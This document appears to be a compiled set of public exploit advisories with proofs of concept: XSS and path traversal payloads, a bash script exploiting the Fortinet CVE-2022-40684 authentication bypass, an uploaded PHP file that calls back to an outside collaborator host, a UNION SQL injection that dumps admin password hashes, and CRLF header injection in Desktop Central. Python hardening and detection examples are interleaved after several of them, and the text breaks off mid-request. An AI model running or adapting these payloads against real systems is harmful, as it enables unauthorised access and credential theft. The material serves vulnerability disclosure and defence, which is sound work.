<pre><code># Exploit Title: Rental House Management System - Reflected Cross-Site Scripting (XSS)<br /># Date: 25/03/2023<br /># Exploit Author: İsmail Can Durna<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/admin/rental_house_management_system.zip<br /># Version: 1<br /># Tested on: Windows/Linux<br /># Proof of Concept:<br /># 1- Rental House Management System<br /># 2- Go to http://localhost/rental_house/rental_house/login.php<br /># 3- Add payload to the URL, the XSS Payload:<br />/"><script>alert('XSS')</script><br />Url encoded: /%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br /># 4- XSS has been triggered.<br /># Go to this url "http://localhost/rental_house/rental_house/login.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E"<br />XSS will trigger.<br /></code></pre>
<pre><code># Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: http://wpn-xm.org/<br /># Software Link : https://github.com/WPN-XM/WPN-XM/<br /># Tested Version: 0.8.6<br /># Tested on: Windows 10 using XAMPP<br /><br /># Vulnerability Type: Local File Inclusion (LFI) & directory traversal<br />(path traversal)<br /><br />CVSS v3: 7.5<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-829, CWE-22<br /><br />Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows<br />unauthenticated directory traversal and Local File Inclusion through the<br />page parameter in a /tools/webinterface/index.php?page=..\..\..\..\..\..\hello<br />(without .php) GET request.<br /><br />Proof of concept:<br /><br />To detect: http://localhost/tools/webinterface/index.php?page=)<br /><br />The parameter "page" can be modified to load a PHP file from the server.<br /><br />Example: a file C:\hello.php with this content:<br /><br />C:\>type hello.php<br /><?php<br />echo "HELLO FROM C:\\hello.php";<br />?><br /><br /><br />To get hello.php from C:\ :<br />http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello<br /><br />Note: "hello" without ".php".<br /><br />The PHP output appears in the browser at the start of the response.<br /><br />Response:<br /><br />HELLO FROM C:\hello.php<!DOCTYPE html><br /><html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /> <meta charset="utf-8" /><br /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta name="viewport" content="width=device-width, initial-scale=1"><br /><br /> <title>WP?-XM Server Stack for Windows - 0.8.6</title><br /> <meta name="description" content="WP?-XM Server Stack for Windows -<br />Webinterface."><br /> <meta name="author" content="Jens-André Koch" 
/><br /> <link rel="shortcut icon" href="favicon.ico" /><br /><br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the<br />/tools/webinterface/index.php, in multiple parameters.<br /><br />Proof of concept:<br /><br />http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help<br />http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help<br />http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E<br /><br /><br /></code></pre>
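A hardened version of the two request-handling paths this advisory describes, written as an added Python example rather than code from WPN-XM (the project is PHP; the pages directory, the allowlist and the link markup below are assumptions, since the real file layout is not shown). `resolve_page` refuses the `..\..\hello` style traversal by allowlisting page names and then checking that the canonical path still lies under the pages directory, treating `\` as a separator the way the Windows host in the advisory does; `render_tab_link` shows the output encoding that the reflected `action`, `page` and `tab` parameters lack, and the same encoding applies to the reflected path in the Rental House Management System advisory above.

```python
import html
import posixpath
from urllib.parse import quote, unquote

# Constructed layout (assumption): page templates live as <name>.php under PAGES_DIR.
PAGES_DIR = "/srv/webinterface/pages"
# Constructed allowlist of page names the webinterface may include.
ALLOWED_PAGES = frozenset({"index", "config", "help", "tools"})


def is_contained(page_name, pages_dir=PAGES_DIR):
    """True if pages_dir/<page_name>.php canonicalises to a path inside pages_dir.

    Both '/' and '\\' are treated as separators because the advisory's host is
    Windows, where '..\\..\\hello' walks up the tree just as '../../hello' does.
    """
    normalised = page_name.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(pages_dir, normalised + ".php"))
    root = pages_dir.rstrip("/") + "/"
    return candidate.startswith(root)


def resolve_page(page_param, pages_dir=PAGES_DIR):
    """Map the raw ?page= value to the file to include, or None to refuse.

    Decode first (so %2e%2e is seen as ..), then apply two independent checks:
    an allowlist of names, and the containment check as defence in depth.
    Appending '.php' is not a control: the advisory shows the traversal works
    precisely because the server appends the extension to the attacker's name.
    """
    name = unquote(page_param)
    if name not in ALLOWED_PAGES:
        return None
    if not is_contained(name, pages_dir):
        return None
    return posixpath.join(pages_dir, name + ".php")


def render_tab_link(action, page, tab):
    """Reflect the three parameters into HTML with context-aware encoding.

    Values inside the href are URL-encoded (so '<', '>' and quotes cannot
    terminate the attribute or form markup), the whole attribute is then
    HTML-escaped, and the visible link text is HTML-escaped separately.
    """
    query = "&".join(
        f"{key}={quote(value, safe='')}"
        for key, value in (("action", action), ("page", page), ("tab", tab))
    )
    return (
        f'<a href="index.php?{html.escape(query, quote=True)}">'
        f"{html.escape(tab, quote=True)}</a>"
    )


if __name__ == "__main__":
    # Inputs taken from the advisory's proof-of-concept URLs.
    for raw in ("config", "..\\..\\..\\..\\..\\..\\hello", "%2e%2e%5c%2e%2e%5chello"):
        print(f"page={raw!r:40} -> {resolve_page(raw)}")
    print(render_tab_link("showtab", "config", "help<script>alert(1);</script>"))
```

The allowlist is the control that actually closes the hole; the containment check is there so that a later change to the allowlist (say, accepting names with subdirectories) still cannot reach outside the pages directory.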
<pre><code># Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)<br /># Date: 13/10/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.fortinet.com/<br /># Version:<br />#FortiOS from 7.2.0 to 7.2.1<br />#FortiOS from 7.0.0 to 7.0.6<br />#FortiProxy 7.2.0<br />#FortiProxy from 7.0.0 to 7.0.6<br />#FortiSwitchManager 7.2.0<br />#FortiSwitchManager 7.0.0<br /># Tested on: Kali Linux<br /># CVE : CVE-2022-40684<br /><br /># https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass<br /><br /># Usage: ./poc.sh <ip> <port><br /># Example: ./poc.sh 10.10.10.120 8443<br /><br />#!/bin/bash<br /><br />red="\e[0;31m\033[1m"<br />blue="\e[0;34m\033[1m"<br />yellow="\e[0;33m\033[1m"<br />end="\033[0m\e[0m"<br /><br />target=$1<br />port=$2<br /><br />vuln () {<br /><br />echo -e "${yellow}[+] Dumping System Information: ${end}"<br /><br />timeout 10 curl -s -k -X $'GET' \<br /> -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out<br />if [ "$?" == "0" ];then<br /> grep "results" ./$target.out >/dev/null<br /> if [ "$?" == "0" ];then<br /> echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"<br /> else <br /> rm -f ./$target.out<br /> echo -e "${red}Not Vulnerable ${end}"<br /> fi<br /><br />else<br /><br /> echo -e "${red}Not Vulnerable ${end}"<br /> rm -f ./$target.out<br /><br />fi<br /><br /><br />}<br /><br />vuln<br /><br /></code></pre>
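From the detection side, the request the script sends has a recognisable shape: a management API path, a `User-Agent` of `Node.js`, a `Forwarded` header naming a loopback client, and an `X-Forwarded-Vdom` header. The Python below is an added example (not Fortinet's code and not the PoC author's) that parses raw request records and reports which of those traits are present; the two sample requests are constructed, and it is an assumption that your proxy or firewall logs expose these headers. A hit is a hunting lead to confirm against the vendor's own indicators, not proof of compromise by itself.

```python
import ipaddress

# Constructed request records in the shape the PoC script emits.
PROBE_REQUEST = (
    "GET /api/v2/cmdb/system/admin HTTP/1.1\r\n"
    "Host: 127.0.0.1:9980\r\n"
    "User-Agent: Node.js\r\n"
    'Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=\r\n'
    "X-Forwarded-Vdom: root\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /api/v2/cmdb/system/admin HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Authorization: Bearer REDACTED-CONSTRUCTED\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, target, headers).
    Header names are lower-cased; duplicate headers keep the last value."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def forwarded_client_is_loopback(forwarded):
    """Parse an RFC 7239 Forwarded header and report whether its for= element
    names a loopback address, e.g. for="[127.0.0.1]:49490" -> True."""
    for element in forwarded.split(";"):
        key, _, value = element.partition("=")
        if key.strip().lower() != "for":
            continue
        value = value.strip().strip('"')
        if value.startswith("["):
            host = value[1:].split("]", 1)[0]   # bracketed IPv4/IPv6 with port
        else:
            host = value.split(":", 1)[0]
        try:
            if ipaddress.ip_address(host).is_loopback:
                return True
        except ValueError:
            pass  # obfuscated identifier or hostname, not an IP literal
    return False


def suspicious_traits(raw):
    """Return the list of PoC-like traits found in one request record."""
    _method, target, headers = parse_request(raw)
    traits = []
    if not target.startswith("/api/v2/"):
        return traits  # only the management API is of interest here
    if headers.get("user-agent") == "Node.js":
        traits.append("user-agent Node.js on management API")
    if forwarded_client_is_loopback(headers.get("forwarded", "")):
        traits.append("Forwarded header claims a loopback client")
    if "x-forwarded-vdom" in headers:
        traits.append("X-Forwarded-Vdom header present")
    return traits


def scan(records):
    """Map each record index to its traits, keeping only records with at least one."""
    return {i: t for i, r in enumerate(records) if (t := suspicious_traits(r))}


if __name__ == "__main__":
    for index, found in scan([PROBE_REQUEST, BENIGN_REQUEST]).items():
        print(f"record {index}: {', '.join(found)}")
```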
<pre><code># Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://github.com/MegaTKC/AeroCMS<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 0.0.1<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: image (content of the uploaded image file)<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116<br />Content-Length: 1156<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post<br />Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_title"<br /><br />mmmmmmmmmmmmmmmmm<br />-----------------------------369779619541997471051134453116<br 
/>Content-Disposition: form-data; name="post_category_id"<br /><br />1<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_user"<br /><br />admin<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_status"<br /><br />draft<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"<br />Content-Type: text/plain<br /><br /><?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_tags"<br /><br /><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_content"<br /><br /><p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="create_post"<br /><br />Publish Post<br />-----------------------------369779619541997471051134453116--<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.<br /><br /><br /></code></pre>
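The upload goes through because the `image` part's file name and declared `Content-Type` are trusted. The Python below is an added example, not AeroCMS code, of a validator that decides the file type from the bytes themselves, ignores the client-supplied name, and generates the name and extension it stores under; the magic-byte table, size limit and sample payloads are constructed. Its server-side counterpart is a storage directory the web server will not execute scripts from.

```python
import secrets

# Constructed table: accepted image types by their leading bytes (magic numbers).
IMAGE_MAGIC = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
EXTENSION_FOR = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # constructed limit


class UploadRejected(ValueError):
    """Raised with a reason the caller can log (not necessarily show the user)."""


def sniff_image_type(data):
    """Return the MIME type implied by the file's own leading bytes, or None."""
    for mime, magics in IMAGE_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return mime
    return None


def validate_upload(client_filename, client_content_type, data):
    """Decide whether an uploaded 'image' part may be stored.

    client_filename and client_content_type are attacker-controlled and are
    only echoed in the rejection reason; the decision rests on the bytes.
    Returns the sniffed MIME type on success.
    """
    if not data:
        raise UploadRejected("empty file")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected(f"file exceeds {MAX_UPLOAD_BYTES} bytes")
    sniffed = sniff_image_type(data)
    if sniffed is None:
        raise UploadRejected(
            f"content of {client_filename!r} (declared {client_content_type!r}) "
            "is not a supported image")
    return sniffed


def storage_name(mime, token=None):
    """Server-chosen name: random token plus the extension for the sniffed type.
    The extension never comes from the client, so 'x.php' cannot survive."""
    token = token or secrets.token_hex(8)
    return token + EXTENSION_FOR[mime]


# Constructed samples: the PoC's shape (a .php name carrying PHP source) and a
# minimal PNG header, used to show the validator's two outcomes.
PHP_UPLOAD = b"<?php echo 'constructed'; ?>"
PNG_UPLOAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def outcome(client_filename, client_content_type, data):
    """Helper returning ('stored', name) or ('rejected', reason)."""
    try:
        mime = validate_upload(client_filename, client_content_type, data)
    except UploadRejected as exc:
        return ("rejected", str(exc))
    return ("stored", storage_name(mime, token="deadbeef"))  # fixed token for the demo


if __name__ == "__main__":
    print(outcome("at8vapghhb.php", "text/plain", PHP_UPLOAD))
    print(outcome("avatar.php", "image/png", PNG_UPLOAD))  # name lies, bytes do not
```

Magic-byte sniffing alone does not stop a polyglot (a valid image header followed by script), which is why the generated extension and the non-executable storage location are part of the same control rather than optional extras.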
<pre><code># Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://github.com/MegaTKC/AeroCMS<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 0.0.1<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example SQL Injection<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Param: search<br />-----------------------------------------------------------------------------------------------------------------------<br />Req: SQL injection detection<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 21<br /><br />search=245692'&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 03:07:06 GMT<br />Server: Apache/2.4.38 
(Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Content-Length: 3466<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />[...]<br />Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 21<br /><br />search=245692''&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 03:07:10 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: 
no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 94216<br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req: exploiting the SQL injection to extract the admin user's data<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 113<br /><br />search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 05:40:05 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br 
/>Content-Length: 101144<br />[...]<br /><br /> <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Other URL and params<br />-----------------------------------------------------------------------------------------------------------------------<br />/AeroCMS-master/admin/posts.php [post_title]<br />/AeroCMS-master/admin/posts.php [filename]<br />/AeroCMS-master/admin/profile.php [filename]<br />/AeroCMS-master/author_posts.php [author]<br />/AeroCMS-master/category.php [category]<br />/AeroCMS-master/post.php [p_id]<br />/AeroCMS-master/search.php [search]<br />/AeroCMS-master/admin/categories.php [cat_title]<br />/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]<br />/AeroCMS-master/admin/posts.php [post_content]<br />/AeroCMS-master/admin/posts.php [p_id]<br />/AeroCMS-master/admin/posts.php [post_category_id]<br />/AeroCMS-master/admin/posts.php [post_title]<br />/AeroCMS-master/admin/posts.php [reset]<br /><br /><br /></code></pre>
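The `Query failed ... near '%''` error in the first response is the signature of a search term spliced into the SQL text. The Python below is an added example, not AeroCMS code, that reproduces that behaviour against an in-memory SQLite database (the table shapes and rows are constructed) and places the parameterised query beside it; with a bound parameter the single quote, the doubled quote and a UNION payload are all just search text.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the CMS database: a posts table to search and
    a users table like the one the advisory's UNION payload reads from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (post_id INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        INSERT INTO posts VALUES (1, 'Welcome', 'first post'),
                                 (2, 'Release notes', 'version 0.0.1');
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'CONSTRUCTED-HASH');
    """)
    return conn


def search_vulnerable(conn, search):
    """The advisory's pattern: the search term is concatenated into the SQL
    string, so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT post_id, post_title FROM posts "
           "WHERE post_title LIKE '%" + search + "%' "
           "OR post_content LIKE '%" + search + "%'")
    return conn.execute(sql).fetchall()


def like_pattern(term):
    """Escape LIKE metacharacters so a user term matches literally."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return "%" + escaped + "%"


def search_safe(conn, search):
    """Same query with the term bound as a parameter: the driver sends it as
    data, so no character in it can change the statement's structure."""
    sql = ("SELECT post_id, post_title FROM posts "
           "WHERE post_title LIKE ? ESCAPE '\\' "
           "OR post_content LIKE ? ESCAPE '\\'")
    pattern = like_pattern(search)
    return conn.execute(sql, (pattern, pattern)).fetchall()


def outcome(conn, query_fn, search):
    """('rows', n) when the statement ran, ('error', message) when it did not,
    which is exactly the difference the advisory's first two requests show."""
    try:
        rows = query_fn(conn, search)
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("rows", len(rows))


if __name__ == "__main__":
    db = make_db()
    for term in ("Welcome", "245692'", "245692''"):
        print(f"{term!r:12} vulnerable={outcome(db, search_vulnerable, term)} "
              f"safe={outcome(db, search_safe, term)}")
```

The `'` versus `''` pair is the same probe the advisory uses: an error on the single quote and a clean page on the doubled quote tells you the input reaches the parser as SQL. The parameterised version returns `('rows', 0)` for both, because neither is a substring of any post.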
<pre><code># Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-02-14<br /># Software Link : http://www.desktopcentral.com<br /># Tested Version: 9.1.0 (Build No: 91084)<br /># Tested on: Windows 10<br /><br /># Vulnerability Type: CRLF injection (CRLF) - 1<br /><br />CVSS v3: 6.1<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-93<br /><br />Vulnerability description: CRLF injection vulnerability in ManageEngine<br />Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP<br />headers and conduct HTTP response splitting attacks via the fileName<br />parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.<br /><br />Proof of concept:<br /><br />GET<br />https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101<br />Firefox/85.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />DNT: 1<br />Connection: keep-alive<br />Referer:<br />https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering<br />Upgrade-Insecure-Requests: 1<br />Content-Length: 0<br />Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;<br />STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;<br />showRefMsg=false; summarypage=false;<br />DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;<br />JSESSIONID=0B20DEF653941DAF5748931B67972CDB;<br />JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024<br />Host: localhost<br /><br 
/>Response:<br />HTTP/1.1 200 OK<br />Date:<br />Server: Apache<br />Pragma: public<br />Cache-Control: max-age=0<br />Expires: Wed, 31 Dec 1969 16:00:00 PST<br />SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;<br />Secure<br />Set-Cookie: buildNum=91084; Path=/<br />Set-Cookie: showRefMsg=false; Path=/<br />Set-Cookie: summarypage=false; Path=/<br />Set-Cookie: dc_customerid=1; Path=/<br />Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/<br />Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/<br />Set-Cookie: screenResolution=1280x1024; Path=/<br />Content-Disposition: attachment; filename=any<br />Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv<br />X-dc-header: yes<br />Content-Length: 95<br />Keep-Alive: timeout=5, max=20<br />Connection: Keep-Alive<br />Content-Type: text/csv;charset=UTF-8<br /><br /><br /># Vulnerability Type: CRLF injection (CRLF) - 2<br /><br />CVSS v3: 6.1<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-93<br /><br />Vulnerability description: CRLF injection vulnerability in ManageEngine<br />Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP<br />headers and conduct HTTP response splitting attacks via the fileName<br />parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.<br /><br />Proof of concept:<br /><br />GET<br />https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101<br />Firefox/85.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />DNT: 1<br />Connection: keep-alive<br />Referer:<br />https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering<br 
